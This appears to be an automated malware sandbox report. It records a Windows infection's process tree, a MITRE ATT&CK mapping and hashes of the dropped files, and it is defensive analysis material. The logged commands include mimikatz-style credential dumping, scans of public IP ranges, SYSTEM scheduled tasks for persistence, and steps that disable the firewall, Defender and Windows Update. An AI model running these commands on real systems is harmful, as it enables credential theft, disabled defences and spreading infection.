C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2848
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2284
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:2680
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2756
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2132
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1780
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\helcklvge\cecisfuae\wpcap.exe /S2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\helcklvge\cecisfuae\wpcap.exeC:\Windows\helcklvge\cecisfuae\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵PID:1516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2312
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
PID:2116 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1588
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
PID:976 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:276
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1900 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1992
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2280 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2412
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1596 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1532
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\helcklvge\cecisfuae\gidqkybty.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\helcklvge\cecisfuae\Scant.txt2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1576 -
C:\Windows\helcklvge\cecisfuae\gidqkybty.exeC:\Windows\helcklvge\cecisfuae\gidqkybty.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\helcklvge\cecisfuae\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\helcklvge\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\helcklvge\Corporate\log.txt2⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1592 -
C:\Windows\helcklvge\Corporate\vfshost.exeC:\Windows\helcklvge\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rtclehyzs" /ru system /tr "cmd /c C:\Windows\ime\zyztlgt.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rtclehyzs" /ru system /tr "cmd /c C:\Windows\ime\zyztlgt.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hiztivbus" /ru system /tr "cmd /c echo Y|cacls C:\Windows\sivbltti\zyztlgt.exe /p everyone:F"2⤵PID:1928
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "hiztivbus" /ru system /tr "cmd /c echo Y|cacls C:\Windows\sivbltti\zyztlgt.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iebwclzcy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\fjyenfsri\ugfccu.exe /p everyone:F"2⤵PID:1076
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "iebwclzcy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\fjyenfsri\ugfccu.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2832
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:844
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:668
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2716
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2796
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2208
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2184
-
-
C:\Windows\TEMP\helcklvge\reczeebjt.exeC:\Windows\TEMP\helcklvge\reczeebjt.exe -accepteula -mp 108 C:\Windows\TEMP\helcklvge\108.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1780
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:972
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1996
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2192
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2632
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2032
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
PID:1432 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
PID:2316 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:1508
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:2412
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2448
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
PID:1236 -
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
PID:288 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
PID:1408 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
PID:1964
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
PID:1988 -
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
PID:1956 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
PID:2012
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:2548
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:1844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
PID:3064
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2420 -
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:584
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:1604 -
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:236 -
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2308
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2344
-
-
C:\Windows\TEMP\helcklvge\reczeebjt.exeC:\Windows\TEMP\helcklvge\reczeebjt.exe -accepteula -mp 1088 C:\Windows\TEMP\helcklvge\1088.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\TEMP\helcklvge\reczeebjt.exeC:\Windows\TEMP\helcklvge\reczeebjt.exe -accepteula -mp 1160 C:\Windows\TEMP\helcklvge\1160.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\TEMP\helcklvge\reczeebjt.exeC:\Windows\TEMP\helcklvge\reczeebjt.exe -accepteula -mp 1440 C:\Windows\TEMP\helcklvge\1440.dmp2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Windows\TEMP\helcklvge\reczeebjt.exeC:\Windows\TEMP\helcklvge\reczeebjt.exe -accepteula -mp 796 C:\Windows\TEMP\helcklvge\796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
C:\Windows\TEMP\helcklvge\reczeebjt.exeC:\Windows\TEMP\helcklvge\reczeebjt.exe -accepteula -mp 1032 C:\Windows\TEMP\helcklvge\1032.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
C:\Windows\TEMP\helcklvge\reczeebjt.exeC:\Windows\TEMP\helcklvge\reczeebjt.exe -accepteula -mp 364 C:\Windows\TEMP\helcklvge\364.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\TEMP\helcklvge\reczeebjt.exeC:\Windows\TEMP\helcklvge\reczeebjt.exe -accepteula -mp 1900 C:\Windows\TEMP\helcklvge\1900.dmp2⤵
- Executes dropped EXE
PID:1056
-
-
C:\Windows\TEMP\helcklvge\reczeebjt.exeC:\Windows\TEMP\helcklvge\reczeebjt.exe -accepteula -mp 2928 C:\Windows\TEMP\helcklvge\2928.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:868
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\helcklvge\cecisfuae\scan.bat2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1988 -
C:\Windows\helcklvge\cecisfuae\ueuhitnlf.exeueuhitnlf.exe TCP 212.102.0.1 212.102.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1408
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
C:\Windows\SysWOW64\aaugog.exeC:\Windows\SysWOW64\aaugog.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2892
-
C:\Windows\system32\taskeng.exetaskeng.exe {C263D562-996B-42BD-88B6-58F95D340DD5} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1544
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\zyztlgt.exe2⤵PID:1900
-
C:\Windows\ime\zyztlgt.exeC:\Windows\ime\zyztlgt.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1728
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\fjyenfsri\ugfccu.exe /p everyone:F2⤵PID:2220
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2364
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\fjyenfsri\ugfccu.exe /p everyone:F3⤵PID:2032
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\sivbltti\zyztlgt.exe /p everyone:F2⤵PID:436
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2404
-
-
C:\Windows\system32\cacls.execacls C:\Windows\sivbltti\zyztlgt.exe /p everyone:F3⤵PID:608
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\zyztlgt.exe2⤵PID:2560
-
C:\Windows\ime\zyztlgt.exeC:\Windows\ime\zyztlgt.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1236
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\fjyenfsri\ugfccu.exe /p everyone:F2⤵PID:3528
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3456
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\fjyenfsri\ugfccu.exe /p everyone:F3⤵PID:3332
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\sivbltti\zyztlgt.exe /p everyone:F2⤵PID:3364
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3520
-
-
C:\Windows\system32\cacls.execacls C:\Windows\sivbltti\zyztlgt.exe /p everyone:F3⤵PID:3108
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Subvert Trust Controls
1Install Root Certificate
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
2.2MB
MD5509a5983c138dbe21cd894714bdcef24
SHA114639229504295ae85347f7e4dd42357271916f1
SHA2569bea400368736591e922e17a5ffb5f6557b2d1f5f9098a711ab725059ca86239
SHA512f15d6e70aa3605ebb4cf7492cf8940a88dde8bb7f0e7c1f064e67be9edae165755d366d92cc5a4c6705dca1661acdbef0203ea33e4c7a056dfcb514972b8e57c
-
Filesize
4.6MB
MD500f381cdede568aedfca99d559e266cf
SHA135081b2ff91cf3884c60e1e632d91cec7b88077d
SHA25637dbd946fed509c5e88f780e5671d099d50f3e220488beb562a2a366514d2b83
SHA5123c2201cee3feed13775829deba3b77c5257159e1be0b4516d40e6c56c095c1b3fd155eb1edabb4c54883468bed315edae5b4067bad0951d465caa7723f3efc45
-
Filesize
1.3MB
MD583233bf67f0771908641535568dda872
SHA14677ea8818a6595f4c458fbb107ea8c1561ff489
SHA25671e614237c5a03868907a5dbb18078fb7a2baaca34dc31bf73e81b52e0ef5555
SHA51216e962ae051de35ad10b7fea425d962fe5dfa9aa932df822c306223cf34b4a53c28537cf72a478d331936aa807d4f29bb9c01d963bce4977e5b156aee6aa548d
-
Filesize
1.3MB
MD514ab95a5e63d547c1d44abf43cbeb7b4
SHA1979c5bbf5bd6948f50426cad05240acdf6ade513
SHA25646de218905e21db205e5333d2c70841d975c8129376d69030be81e2324710dcc
SHA51265a7e1be3422da1302c32cd2309d056e100af8febfd37817342b87f592da4263ce8580e7929019964df345baffab69a872fba7e7d87ce6b4fefc765446a1a922
-
Filesize
5.1MB
MD5069e3ec3786ed8f06d24fafe044ae42d
SHA11b74eeac0e1092af4937b88ef1494280e2bb5775
SHA256ca75ee5a79ee110f11cf75d7c919a001df98b660a4a0eb5b215c24451b1a5ac6
SHA512b50c05fedaa4def018d9c8cc9e431af3ad8dd88207517f5ef063162e201477436d98b0ac312903859de8994130a33915992f387c22d9e8f1548099e1d9fe4653
-
Filesize
843KB
MD5f09e1b4d469f45dcbd7d21ee962040b3
SHA1d499f6fdfdfc9f067cf6d80ffbdce8f94487cc73
SHA256228bc40f83e3f3d61cf899b914b41da8f491cf2d34ea06ffe764b532b834abf0
SHA512a7b1352d19018c4a23adbb08ef2d565a5a5e992e2dc62454ff4e2f872211cd16c5751151deeb1c83d50cf6ddf7aebe7cb6f45d176cbf1fe44c682502a357d301
-
Filesize
6.9MB
MD50b8e883c0c5d157a7facfccd125cda23
SHA1dc4f79cac0a16c349f3bb98ff8e0a16e2254a2c5
SHA256e8987a9dde444c69db42ef827841859143169627ae23d85c1bc79e54a43ac150
SHA5129c48f0450b3ea42ed77de6c652c72e55757997d33401b722f79de1e6c7fd00edc0435b813872a31041fd38d9efd5e92b872a0eebfb39bf5ae104e35913d1c681
-
Filesize
4.7MB
MD58909e393f855187d26bffb3619a3b684
SHA1b8bcb700585ba2ee04aa93631dc656cdc7153216
SHA2569ef37fc9e3a1814dea703fe245bde27b5991541c6286ccaefdd817e80eb250a9
SHA512c18dda5746f3d086b6841fe79ddf1f53ca3c19e16685d0035a1d2de74a8758e7f7f33b3199ce2e76670c802b26b206657476e27d7ec264f22122d1675255307c
-
Filesize
975B
MD5b5d815ff5310f62de5020591be598bc0
SHA18013562b0cc2516d16d474308c8982a31b7f5dd0
SHA256a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85
SHA5124e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
7.7MB
MD5a316079a04422f1ea8a47bdea687b939
SHA199ed485c286c3c9eda3208d6c5f061ce8eab66e7
SHA2563ee69ed593fa0b743d89efd65fc453d5ba2b43bd9c747ccefa1c481d2052fa89
SHA5128277624f8fca48dfb9bd0cc404ff48540a0fbe7a1560f10e29618f5f5514a22e0ead1d07cb8e7992c4cab672521a1684dd70bc9ce7cf51e1ba3f0a0f1642015f